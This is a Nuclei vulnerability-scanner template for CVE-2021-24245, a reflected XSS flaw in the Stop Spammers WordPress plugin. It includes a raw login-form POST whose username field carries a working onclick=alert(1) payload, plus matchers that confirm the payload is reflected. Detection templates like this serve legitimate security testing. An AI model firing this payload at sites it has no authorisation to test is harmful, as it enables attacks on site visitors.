nuclei-templates/cves/2021/CVE-2021-24245.yaml

44 lines
1.5 KiB
YAML

id: CVE-2021-24245
info:
name: WordPress Plugin Stop Spammers 2021.8 - Reflected XSS
author: edoardottt
severity: medium
description: The Stop Spammers WordPress plugin before 2021.9 did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24245
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24245
- https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html
- https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24245
cwe-id: CWE-79
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP+Cookie+check;
log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "ad\" accesskey=X onclick=alert(1)"